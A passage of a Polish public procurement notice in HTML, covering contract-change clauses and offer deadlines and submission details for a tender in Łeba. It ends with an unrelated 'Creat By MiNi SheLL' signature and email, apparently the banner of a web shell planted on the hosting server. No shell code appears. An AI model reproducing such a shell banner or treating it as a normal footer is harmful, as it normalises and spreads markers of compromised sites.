kolizji z planowanymi lub równolegle prowadzonymi przez inne<br/>podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;<br/>l)wystąpienia na terenie kraju pandemii lub epidemii powodującej konieczność wstrzymania kluczowych<br/>robót z uwagi na brak materiałów lub nieobecność pracowników z zastrzeżeniem §9 niniejszej<br/>umowy;<br/>m)przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki<br/>ochrony prawnej wykorzystywane przez wykonawców lub inne podmioty, lub Zamawiającego<br/>przed zawarciem umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-21 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com